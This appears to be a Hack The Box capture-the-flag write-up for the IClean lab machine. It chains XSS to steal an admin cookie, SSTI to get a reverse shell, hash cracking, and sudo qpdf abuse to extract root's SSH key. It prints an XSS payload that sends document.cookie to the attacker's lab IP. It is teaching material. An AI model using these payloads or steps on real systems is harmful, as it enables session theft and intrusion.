HTB
HTB IClean writeup [30 pts]
IClean is a Linux medium machine where we will learn different things. First, there is a web that offers a cleaning service where I will exploit an XSS vulnerability to retrieve admin’s cookie. Then, I will exploit SSTI vulnerability to gain access as www-data. From there, I can get credentials for the database and crack a hash for consuela user. Finally, I will abuse the –add-attachment option of qpdf to exploit a sudoers privilege.
Enumeration
Port scanning
I will start with a basic TCP port scanning with nmap to see which ports are open and see which services are running:
- -sVC: Identifies service and version.
- -p-: scans all the range of ports (1-65535).
- –open: shows only open ports and not filtered or closed.
- -sS: TCP SYN scan that improves velocity because it doesn’t establish the connection.
- –min-rate 5000: Sends 5000 packets per second to improve velocity (don’t do this in a real environment).
- -n: Disables DNS resolution protocol.
- -v: Enables verbose to see which ports are opened while it’s scanning
- -Pn: Disables host discovery protocol (ping).
- -oN targeted: Exports the evidence to a file named “tcpTargeted”.
There is port 80 running apache server, so let’s jump into it.
Web enumeration
Looking at the server response, it’s very short:
It redirects to capiclean.htb, so I will add this line to the /etc/hosts:
This page shows a cleaning service web:
Looking more below, it’s possible to see a “Get a quote” button:
There, I can request a service to clean something, which makes a POST request to /sendMessage:
As it seems to send a message, I will try an HTML injection that loads an image from my http server. For that, I will start a simple python http server:
The response doesn’t change, but we receive a request for test.jpg from the machine’s IP (10.10.11.12):
I will try to retrieve somebody’s cookie by injecting a script which sends a request to my server with his cookie as the route. Trying with <script>fetch("http://10.10.15.95/"+document.cookie)</script>
doesn’t works but with a onerror declaration of an img tag, I can successfully retrieve somebody’s cookie:
Fuzzing to find a route where this cookie would be useful, I can see /dashboard, which without cookie gives a redirect to /:
So I will introduce this cookie into firefox and navigate to /dashboard:
There’s a bunch of functionalities here, let’s see each one carefully.
Generate Invoice
This leds to /InvoiceGenerator, its to generate a invoice for the clients that want the cleaning service:
When some data is submitted, it gives a “Invoice ID”:
Generate QR
This page asks for a Invoice ID:
I will introduce the one I created before and see what happens:
Now, it gives a valid link for an image (which is a QR) that looks like this:
Also, there is a new form to generate the scannable invoice where I need to introduce the qr link given. I will introduce it and see it reflects my data:
Also notice that the img is loaded with the data:// wrapper:
For some strange reason, if I inject a SSTI payload, it interprets and shows the data there:
Access as www-data
The only payload that works in this case to execute commands it’s this from payloadallthethings:
So I will start a nc listener to receive a shell and start the typical one with bash:
And I receive the reverse shell!:
The script /dev/null -c bash
command doesn’t work here:
So I will use python instead and do the same as always for a proper shell:
-
python3 -c "import pty; pty.spawn('/bin/bash')"
: Spawns a tty. -
ctrl+z
: puts the shell in background for later doing a treatment. -
stty raw -echo;fg
: give us the shell back again. -
reset xterm
: resets the terminal to give us the bash console. -
export TERM=xterm
: let us do ctrl+l to clean the terminal. -
export SHELL=bash
: specifies the system that we are using a bash console. -
stty rows <YOUR ROWS> columns <YOUR COLUMNS>
: establishes the size of the current full terminal window, you can view the adequate running stty size on your machine (you can view it withstty size
in a complete new window).
Access as consuela
Looking at the users with shell (ends with sh), there is only one user called ‘consuela’ apart from root:
Also, in the app.py, to check the users it’s using a SQL database:
This password doesn’t work with consuela:
But I can connect to the database:
In the capiclean database there is a ‘users’ table:
I will describe it to see the columns and extract the interesting ones:
There are two hashes, one for admin and another for consuela. This hashes are sha256 as can be shown in the login functionality of the script that runs the webserver:
I will try to crack them with john and the consuela one is crackable:
Also works for consuela in the machine and I have access as consuela:
And we can see user.txt!:
Access as root
Looking at sudo privileges, I can run /usr/bin/qpdf as any user I want:
Searching qpdf
in google I can see it’s a C++ program to manage PDF files:
I also have the version:
There isn’t a known vulnerability for this version. However, I can read its documentation and see if I can find any functionality to abuse this sudo privilege as root. In this section there are options to list, add or delete embedded files in pdfs, so I will use –add-attachment to add /root/.ssh/id_rsa to a dummy pdf. For that, I will use a http server to upload my pdf file to the machine:
Attacker machine:
IClean machine:
Now execute this command to add the attachment /root/.ssh/id_rsa to dummyWithSSHKey.pdf:
I will transfer it to my machine to work better:
Attacker:
IClean:
Viewing it in Firefox, it’s possible to obtain the root ssh key:
Clicking on it just downloads it. Now I can connect as root to IClean and see root.txt!: